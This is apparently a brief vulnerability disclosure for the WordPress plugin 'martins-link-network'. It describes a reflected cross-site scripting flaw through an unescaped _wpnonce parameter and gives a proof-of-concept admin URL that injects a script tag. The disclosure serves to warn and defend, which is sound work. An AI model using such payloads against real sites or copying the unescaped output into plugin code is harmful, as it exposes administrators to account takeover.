Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in amin open
https://example.com/wp-admin/plugins.php?action=deactivate&plugin=martins-link-network%2FmartinsLinkNetwork.php&plugin_status=all&paged=1&s&_wpnonce=%27%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Ca%20href=%27